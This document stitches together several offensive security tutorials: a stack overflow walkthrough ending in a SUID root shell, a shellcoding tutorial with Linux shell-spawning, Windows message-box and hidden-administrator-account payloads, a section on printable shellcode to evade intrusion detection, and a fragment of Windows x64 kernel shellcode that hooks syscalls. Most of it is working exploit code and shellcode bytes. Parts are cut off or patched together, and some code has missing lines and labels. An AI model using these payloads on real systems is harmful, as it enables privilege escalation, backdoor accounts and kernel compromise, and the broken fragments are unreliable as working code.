RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
Invalid $PC address: 0x424242424242
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
No shell for you :(

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Shellcoding for Linux and Windows Tutorial

WARNING: The following text is useful as a historical and basic document on writing shellcodes.

Background Information

  • EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers on the x86 platform.
  • AH, BH, CH and DH access the upper 16-bits of the GPRs.
  • AL, BL, CL, and DL access the lower 8-bits of the GPRs.
  • ESI and EDI are used when making Linux syscalls.
  • Syscalls with 6 arguments or less are passed via the GPRs.
  • XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!)
  • In Windows, all function arguments are passed on the stack according to their calling convention.


Required Tools

  • gcc
  • ld
  • nasm
  • objdump


Optional Tools

  • odfhex.c — a utility created by me to extract the shellcode from «objdump -d» and turn it into escaped hex code (very useful!).
  • arwin.c — a utility created by me to find the absolute addresses of windows functions within a specified DLL.
  • shellcodetest.c — this is just a copy of the c code found  below. it is a small skeleton program to test shellcode.
  • exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm — the source code found in this document (the win32 shellcode was written with Windows XP SP1).

Linux Shellcoding

When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code.


char code[] = "bytecode will go here!";
int main(int argc, char **argv)
  int (*func)();
  func = (int (*)()) code;


Making a Quick Exit

    The easiest way to begin would be to demonstrate the exit syscall due to it’s simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code.

[SECTION .text]
global _start
        xor eax, eax       ;exit is syscall 1
        mov al, 1       ;exit is syscall 1
        xor ebx,ebx     ;zero out ebx
        int 0x80

Take the following steps to compile and extract the byte code.
steve hanna@1337b0x:~$ nasm -f elf exit.asm
steve hanna@1337b0x:~$ ld -o exiter exit.o
steve hanna@1337b0x:~$ objdump -d exiter

exiter:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       b0 01                   mov    $0x1,%al
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       cd 80                   int    $0x80

The bytes we need are b0 01 31 db cd 80.

Replace the code at the top with:
char code[] = «\xb0\x01\x31\xdb\xcd\x80»;

Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit.

Saying Hello

For this next piece, let’s ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space.

[SECTION .text]

global _start


        jmp short ender


        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 5       ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

        call starter	;put the address of the string on the stack
        db 'hello'


steve hanna@1337b0x:~$ nasm -f elf hello.asm
steve hanna@1337b0x:~$ ld -o hello hello.o
steve hanna@1337b0x:~$ objdump -d hello

hello:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 19                   jmp    804809b 

08048082 <starter>:
 8048082:       31 c0                   xor    %eax,%eax
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       31 c9                   xor    %ecx,%ecx
 804808a:       b0 04                   mov    $0x4,%al
 804808c:       b3 01                   mov    $0x1,%bl
 804808e:       59                      pop    %ecx
 804808f:       b2 05                   mov    $0x5,%dl
 8048091:       cd 80                   int    $0x80
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       b0 01                   mov    $0x1,%al
 8048097:       31 db                   xor    %ebx,%ebx
 8048099:       cd 80                   int    $0x80

0804809b <ender>:
 804809b:       e8 e2 ff ff ff          call   8048082 
 80480a0:       68 65 6c 6c 6f          push   $0x6f6c6c65

Replace the code at the top with:
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\

At this point we have a fully functional piece of shellcode that outputs to stdout.
Now that dynamic string addressing has been demonstrated as well as the ability to zero
out registers, we can move on to a piece of code that gets us a shell.

Spawning a Shell

    This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system(«/bin/sh») would have been a lot simpler right? Well the only problem with that approach is the fact that system always drops privileges.

Remember when reading this code:
    execve (const char *filename, const char** argv, const char** envp);

So, the second two argument expect pointers to pointers. That’s why I load the address of the «/bin/sh» into the string memory and then pass the address of the string memory to the function. When the pointers are dereferenced the target memory will be the «/bin/sh» string.

[SECTION .text]

global _start

        xor eax, eax
        mov al, 70              ;setreuid is syscall 70
        xor ebx, ebx
        xor ecx, ecx
        int 0x80

        jmp short ender


        pop ebx                 ;get the address of the string
        xor eax, eax

        mov [ebx+7 ], al        ;put a NULL where the N is in the string
        mov [ebx+8 ], ebx       ;put the address of the string to where the
                                ;AAAA is
        mov [ebx+12], eax       ;put 4 null bytes into where the BBBB is
        mov al, 11              ;execve is syscall 11
        lea ecx, [ebx+8]        ;load the address of where the AAAA was
        lea edx, [ebx+12]       ;load the address of the NULLS
        int 0x80                ;call the kernel, WE HAVE A SHELL!

        call starter
        db '/bin/shNAAAABBBB'

steve hanna@1337b0x:~$ nasm -f elf shellex.asm
steve hanna@1337b0x:~$ ld -o shellex shellex.o
steve hanna@1337b0x:~$ objdump -d shellex

shellex:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       eb 16                   jmp    80480a2 

0804808c :
 804808c:       5b                      pop    %ebx
 804808d:       31 c0                   xor    %eax,%eax
 804808f:       88 43 07                mov    %al,0x7(%ebx)
 8048092:       89 5b 08                mov    %ebx,0x8(%ebx)
 8048095:       89 43 0c                mov    %eax,0xc(%ebx)
 8048098:       b0 0b                   mov    $0xb,%al
 804809a:       8d 4b 08                lea    0x8(%ebx),%ecx
 804809d:       8d 53 0c                lea    0xc(%ebx),%edx
 80480a0:       cd 80                   int    $0x80

080480a2 :
 80480a2:       e8 e5 ff ff ff          call   804808c 
 80480a7:       2f                      das
 80480a8:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80480ab:       2f                      das
 80480ac:       73 68                   jae    8048116 <ender+0x74>
 80480ae:       58                      pop    %eax
 80480af:       41                      inc    %ecx
 80480b0:       41                      inc    %ecx
 80480b1:       41                      inc    %ecx
 80480b2:       41                      inc    %ecx
 80480b3:       42                      inc    %edx
 80480b4:       42                      inc    %edx
 80480b5:       42                      inc    %edx
 80480b6:       42                      inc    %edx
Replace the code at the top with:

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
This code produces a fully functional shell when injected into an exploit
and demonstrates most of the skills needed to write successful shellcode. Be
aware though, the better one is at assembly, the more functional, robust,
and most of all evil, one's code will be.

Windows Shellcoding

Sleep is for the Weak!

    In order to write successful code, we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses. For this example we just want a thread to sleep for an allotted amount of time. Let’s load up arwin (found above) and get started. Remember, the only module guaranteed to be mapped into the processes address space is kernel32.dll. So for this example, Sleep seems to be the simplest function, accepting the amount of time the thread should suspend as its only argument.

G:\> arwin kernel32.dll Sleep
arwin - win32 address resolution program - by steve hanna - v.01
Sleep is located at 0x77e61bea in kernel32.dll

[SECTION .text]

global _start

        xor eax,eax
        mov ebx, 0x77e61bea ;address of Sleep
        mov ax, 5000        ;pause for 5000ms
        push eax
        call ebx        ;Sleep(ms);

steve hanna@1337b0x:~$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleep
sleep:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       bb ea 1b e6 77          mov    $0x77e61bea,%ebx
 8048087:       66 b8 88 13             mov    $0x1388,%ax
 804808b:       50                      push   %eax
 804808c:       ff d3                   call   *%ebx

Replace the code at the top with:
char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3";

When this code is inserted it will cause the parent thread to suspend for five seconds (note: it will then probably crash because the stack is smashed at this point :-D).


A Message to say «Hey»

    This second example is useful in the fact that it will show a shellcoder how to do several things within the bounds of windows shellcoding. Although this example does nothing more than pop up a message box and say «hey», it demonstrates absolute addressing as well as the dynamic addressing using LoadLibrary and GetProcAddress. The library functions we will be using are LoadLibraryA, GetProcAddress, MessageBoxA, and ExitProcess (note: the A after the function name specifies we will be using a normal character set, as opposed to a W which would signify a wide character set; such as unicode). Let’s load up arwin and find the addresses we need to use. We will not retrieve the address of MessageBoxA at this time, we will dynamically load that address.

G:\>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll

G:\>arwin kernel32.dll GetProcAddress
arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

[SECTION .text]

global _start

	;eax holds return value
	;ebx will hold function addresses
	;ecx will hold string pointers
	;edx will hold NULL

	xor eax,eax
	xor ebx,ebx			;zero out the registers
	xor ecx,ecx
	xor edx,edx
	jmp short GetLibrary
	pop ecx				;get the library string
	mov [ecx + 10], dl		;insert NULL
	mov ebx, 0x77e7d961		;LoadLibraryA(libraryname);
	push ecx			;beginning of user32.dll
	call ebx			;eax will hold the module handle

	jmp short FunctionName

	pop ecx				;get the address of the Function string
	xor edx,edx
	mov [ecx + 11],dl		;insert NULL
	push ecx
	push eax
	mov ebx, 0x77e7b332		;GetProcAddress(hmodule,functionname);
	call ebx			;eax now holds the address of MessageBoxA
	jmp short Message
	pop ecx				;get the message string
	xor edx,edx			
	mov [ecx+3],dl			;insert the NULL

	xor edx,edx
	push edx			;MB_OK
	push ecx			;title
	push ecx			;message
	push edx			;NULL window handle
	call eax			;MessageBoxA(windowhandle,msg,title,type); Address

	xor edx,edx
	push eax			
	mov eax, 0x77e798fd 		;exitprocess(exitcode);
	call eax			;exit cleanly so we don't crash the parent program

	;the N at the end of each string signifies the location of the NULL
	;character that needs to be inserted
	call LibraryReturn
	db 'user32.dllN'
	call FunctionReturn
	db 'MessageBoxAN'
	call MessageReturn
	db 'HeyN'

[steve hanna@1337b0x]$ nasm -f elf msgbox.asm; ld -o msgbox msgbox.o; objdump -d msgbox

msgbox:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       31 c9                   xor    %ecx,%ecx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       eb 37                   jmp    80480c1 

0804808a :
 804808a:       59                      pop    %ecx
 804808b:       88 51 0a                mov    %dl,0xa(%ecx)
 804808e:       bb 61 d9 e7 77          mov    $0x77e7d961,%ebx
 8048093:       51                      push   %ecx
 8048094:       ff d3                   call   *%ebx
 8048096:       eb 39                   jmp    80480d1 

08048098 :
 8048098:       59                      pop    %ecx
 8048099:       31 d2                   xor    %edx,%edx
 804809b:       88 51 0b                mov    %dl,0xb(%ecx)
 804809e:       51                      push   %ecx
 804809f:       50                      push   %eax
 80480a0:       bb 32 b3 e7 77          mov    $0x77e7b332,%ebx
 80480a5:       ff d3                   call   *%ebx
 80480a7:       eb 39                   jmp    80480e2 

080480a9 :
 80480a9:       59                      pop    %ecx
 80480aa:       31 d2                   xor    %edx,%edx
 80480ac:       88 51 03                mov    %dl,0x3(%ecx)
 80480af:       31 d2                   xor    %edx,%edx
 80480b1:       52                      push   %edx
 80480b2:       51                      push   %ecx
 80480b3:       51                      push   %ecx
 80480b4:       52                      push   %edx
 80480b5:       ff d0                   call   *%eax

080480b7 :
 80480b7:       31 d2                   xor    %edx,%edx
 80480b9:       50                      push   %eax
 80480ba:       b8 fd 98 e7 77          mov    $0x77e798fd,%eax
 80480bf:       ff d0                   call   *%eax

080480c1 :
 80480c1:       e8 c4 ff ff ff          call   804808a 
 80480c6:       75 73                   jne    804813b <message+0x59>
 80480c8:       65                      gs
 80480c9:       72 33                   jb     80480fe <message+0x1c>
 80480cb:       32 2e                   xor    (%esi),%ch
 80480cd:       64                      fs
 80480ce:       6c                      insb   (%dx),%es:(%edi)
 80480cf:       6c                      insb   (%dx),%es:(%edi)
 80480d0:       4e                      dec    %esi

080480d1 :
 80480d1:       e8 c2 ff ff ff          call   8048098 
 80480d6:       4d                      dec    %ebp
 80480d7:       65                      gs
 80480d8:       73 73                   jae    804814d <message+0x6b>
 80480da:       61                      popa  
 80480db:       67                      addr16
 80480dc:       65                      gs
 80480dd:       42                      inc    %edx
 80480de:       6f                      outsl  %ds:(%esi),(%dx)
 80480df:       78 41                   js     8048122 <message+0x40>
 80480e1:       4e                      dec    %esi

080480e2 :
 80480e2:       e8 c2 ff ff ff          call   80480a9 
 80480e7:       48                      dec    %eax
 80480e8:       65                      gs
 80480e9:       79 4e                   jns    8048139 <message+0x57>
Replace the code at the top with:
char code[] =   "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\

This example, while not useful in the fact that it only pops up a message box, illustrates several important concepts when using windows shellcoding. Static addressing as used in most of the example above can be a powerful (and easy) way to whip up working shellcode within minutes. This example shows the process of ensuring that certain DLLs are loaded into a process space. Once the address of the MessageBoxA function is obtained ExitProcess is called to make sure that the program ends without crashing.


Example 3 — Adding an Administrative Account

    This third example is actually quite a bit simpler than the previous shellcode, but this code allows the exploiter to add a user to the remote system and give that user administrative privileges. This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess. Note: the idea for this code was taken from the Metasploit project mentioned above. The difference between the shellcode is that this code is quite a bit smaller than its counterpart, and it can be made even smaller by removing the ExitProcess function!

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

G:\>arwin kernel32.dll WinExec
arwin - win32 address resolution program - by steve hanna - v.01
WinExec is located at 0x77e6fd35 in kernel32.dll

[Section .text]

global _start


jmp short GetCommand

    	 pop ebx            	;ebx now holds the handle to the string
   	 xor eax,eax
   	 push eax
    	 xor eax,eax        	;for some reason the registers can be very volatile, did this just in case
  	 mov [ebx + 89],al   	;insert the NULL character
  	 push ebx
  	 mov ebx,0x77e6fd35
  	 call ebx           	;call WinExec(path,showcode)

   	 xor eax,eax        	;zero the register again, clears winexec retval
   	 push eax
   	 mov ebx, 0x77e798fd
 	 call ebx           	;call ExitProcess(0);

    	;the N at the end of the db will be replaced with a null character
    	call CommandReturn
	db "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN"

steve hanna@1337b0x:~$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduser

adduser:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 1b                   jmp    804809d 

08048082 :
 8048082:       5b                      pop    %ebx
 8048083:       31 c0                   xor    %eax,%eax
 8048085:       50                      push   %eax
 8048086:       31 c0                   xor    %eax,%eax
 8048088:       88 43 59                mov    %al,0x59(%ebx)
 804808b:       53                      push   %ebx
 804808c:       bb 35 fd e6 77          mov    $0x77e6fd35,%ebx
 8048091:       ff d3                   call   *%ebx
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       50                      push   %eax
 8048096:       bb fd 98 e7 77          mov    $0x77e798fd,%ebx
 804809b:       ff d3                   call   *%ebx

0804809d :
 804809d:       e8 e0 ff ff ff          call   8048082 
 80480a2:       63 6d 64                arpl   %bp,0x64(%ebp)
 80480a5:       2e                      cs
 80480a6:       65                      gs
 80480a7:       78 65                   js     804810e <getcommand+0x71>
 80480a9:       20 2f                   and    %ch,(%edi)
 80480ab:       63 20                   arpl   %sp,(%eax)
 80480ad:       6e                      outsb  %ds:(%esi),(%dx)
 80480ae:       65                      gs
 80480af:       74 20                   je     80480d1 <getcommand+0x34>
 80480b1:       75 73                   jne    8048126 <getcommand+0x89>
 80480b3:       65                      gs
 80480b4:       72 20                   jb     80480d6 <getcommand+0x39>
 80480b6:       55                      push   %ebp
 80480b7:       53                      push   %ebx
 80480b8:       45                      inc    %ebp
 80480b9:       52                      push   %edx
 80480ba:       4e                      dec    %esi
 80480bb:       41                      inc    %ecx
 80480bc:       4d                      dec    %ebp
 80480bd:       45                      inc    %ebp
 80480be:       20 50 41                and    %dl,0x41(%eax)
 80480c1:       53                      push   %ebx
 80480c2:       53                      push   %ebx
 80480c3:       57                      push   %edi
 80480c4:       4f                      dec    %edi
 80480c5:       52                      push   %edx
 80480c6:       44                      inc    %esp
 80480c7:       20 2f                   and    %ch,(%edi)
 80480c9:       41                      inc    %ecx
 80480ca:       44                      inc    %esp
 80480cb:       44                      inc    %esp
 80480cc:       20 26                   and    %ah,(%esi)
 80480ce:       26 20 6e 65             and    %ch,%es:0x65(%esi)
 80480d2:       74 20                   je     80480f4 <getcommand+0x57>
 80480d4:       6c                      insb   (%dx),%es:(%edi)
 80480d5:       6f                      outsl  %ds:(%esi),(%dx)
 80480d6:       63 61 6c                arpl   %sp,0x6c(%ecx)
 80480d9:       67 72 6f                addr16 jb 804814b <getcommand+0xae>
 80480dc:       75 70                   jne    804814e <getcommand+0xb1>
 80480de:       20 41 64                and    %al,0x64(%ecx)
 80480e1:       6d                      insl   (%dx),%es:(%edi)
 80480e2:       69 6e 69 73 74 72 61    imul   $0x61727473,0x69(%esi),%ebp
 80480e9:       74 6f                   je     804815a <getcommand+0xbd>
 80480eb:       72 73                   jb     8048160 <getcommand+0xc3>
 80480ed:       20 2f                   and    %ch,(%edi)
 80480ef:       41                      inc    %ecx
 80480f0:       44                      inc    %esp
 80480f1:       44                      inc    %esp
 80480f2:       20 55 53                and    %dl,0x53(%ebp)
 80480f5:       45                      inc    %ebp
 80480f6:       52                      push   %edx
 80480f7:       4e                      dec    %esi
 80480f8:       41                      inc    %ecx
 80480f9:       4d                      dec    %ebp
 80480fa:       45                      inc    %ebp
 80480fb:       4e                      dec    %esi

Replace the code at the top with:
 char code[] =  "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\

When this code is executed it will add a user to the system with the specified password, then adds that user to the local Administrators group. After that code is done executing, the parent process is exited by calling ExitProcess.


Advanced Shellcoding

    This section covers some more advanced topics in shellcoding. Over time I hope to add quite a bit more content here but for the time being I am very busy. If you have any specific requests for topics in this section, please do not hesitate to email me.

Printable Shellcode

The basis for this section is the fact that many Intrustion Detection Systems detect shellcode because of the non-printable characters that are common to all binary data. The IDS observes that a packet containts some binary data (with for instance a NOP sled within this binary data) and as a result may drop the packet. In addition to this, many programs filter input unless it is alpha-numeric. The motivation behind printable alpha-numeric shellcode should be quite obvious. By increasing the size of our shellcode we can implement a method in which our entire shellcode block in in printable characters. This section will differ a bit from the others presented in this paper. This section will simply demonstrate the tactic with small examples without an all encompassing final example.

Our first discussion starts with obfuscating the ever blatant NOP sled. When an IDS sees an arbitrarily long string of NOPs (0x90) it will most likely drop the packet. To get around this we observe the decrement and increment op codes:

	OP Code        Hex       ASCII
	inc eax        0x40        @
	inc ebx        0x43        C
	inc ecx        0x41        A
	inc edx        0x42        B
	dec eax        0x48        H
	dec ebx        0x4B        K
	dec ecx        0x49        I
	dec edx        0x4A        J


It should be pretty obvious that if we insert these operations instead of a NOP sled then the code will not affect the output. This is due to the fact that whenever we use a register in our shellcode we wither move a value into it or we xor it. Incrementing or decrementing the register before our code executes will not change the desired operation.

So, the next portion of this printable shellcode section will discuss a method for making one’s entire block of shellcode alpha-numeric— by means of some major tomfoolery. We must first discuss the few opcodes that fall in the printable ascii range (0x33 through 0x7e).

	sub eax, 0xHEXINRANGE
	push eax
	pop eax
	push esp
	pop esp
	and eax, 0xHEXINRANGE

Surprisingly, we can actually do whatever we want with these instructions. I did my best to keep diagrams out of this talk, but I decided to grace the world with my wonderful ASCII art. Below you can find a diagram of the basic plan for constructing the shellcode.

	The plan works as follows:
		-make space on stack for shellcode and loader
		-execute loader code to construct shellcode
		-use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code.

But now I hear you clamoring that we can’t use move nor can we subtract from esp because they don’t fall into printable characters!!! Settle down, have I got a solution for you! We will use subtract to place values into EAX, push the value to the stack, then pop it into ESP.

Now you’re wondering why I said subtract to put values into EAX, the problem is we can’t use add, and we can’t directly assign nonprintable bytes. How can we overcome this? We can use the fact that each register has only 32 bits, so if we force a wrap around, we can arbitrarily assign values to a register using only printable characters with two to three subtract instructions.

If the gears in your head aren’t cranking yet, you should probably stop reading right now.

	The log awaited ASCII diagram
	EIP(loader code) --------ALLOCATED STACK SPACE--------ESP

	---(loader code)---EIP-------STACK------ESP--(shellcode--

	----loadercode---EIP@ESP----shellcode that was builts---

So, that diagram probably warrants some explanation. Basically, we take our already written shellcode, and generate two to three subtract instructions per four bytes and do the push EAX, pop ESP trick. This basically places the constructed shellcode at the end of the stack and works towards the EIP. So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge (indicated by @) between the builder code and the shellcode. The NOP bridge is used to word align the end of the builder code.

Example code:

	and eax, 0x454e4f4a	;  example of how to zero out eax(unrelated)
	and eax, 0x3a313035
	push esp
	pop eax
	sub eax, 0x39393333	; construct 860 bytes of room on the stack
	sub eax, 0x72727550	
	sub eax, 0x54545421
	push eax		; save into esp
	pop esp

Oh, and I forgot to mention, the code must be inserted in reverse order and the bytes must adhere to the little endian standard.

Shellcodes database







Intel x86-64

Intel x86





Strong ARM






Intel x86-64

Intel x86





Intel x86-64

Intel x86




Intel x86


Windows x64 kernel shellcode from ring 0 to ring 3

The userland shellcode is run in a new thread of system process.
If userland shellcode causes any exception, the system process get killed.
On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
get call because system call is called on other processors.
The shellcode do not allocate shadow stack if possible for minimal shellcode size.
It is ok because some Windows function does not require shadow stack.
Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
The userland payload MUST be appened to this shellcode.

http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)

ASM code:


LSASS_EXE_HASH    EQU    0xc1fa6a5a
SPOOLSV_EXE_HASH    EQU    0x3ee083d8
CREATETHREAD_HASH    EQU    0x835e515e

DATA_KAPC_OFFSET            EQU 0x10

section .text
global shellcode_start


    ; IRQL is DISPATCH_LEVEL when got code execution

%ifdef WIN7
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
%elifdef WIN8
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
    push rbp
    call set_rbp_data_address_fn
    ; read current syscall
    mov ecx, 0xc0000082
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    ; save original syscall
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    pop rbp
%ifdef WIN7
    xor eax, eax
%elifdef WIN8
    xor eax, eax

; Find memory address in HAL heap for using as data area
; Return: rbp = data address
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70   ; for KAPC struct too

    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ; restore syscall
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    ; allow interrupts while executing shellcode
    call r3_to_r0_start
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax

    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ; find nt kernel address
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ; get current EPROCESS and ETHREAD
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS    
    ; find offset of EPROCESS.ImageFilename
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename

    ; find offset of EPROCESS.ThreadListHead
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
%ifdef WIN7
    lea rdx, [rax+0x28]
%elifdef WIN8
    lea rdx, [rax+0x38]
    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
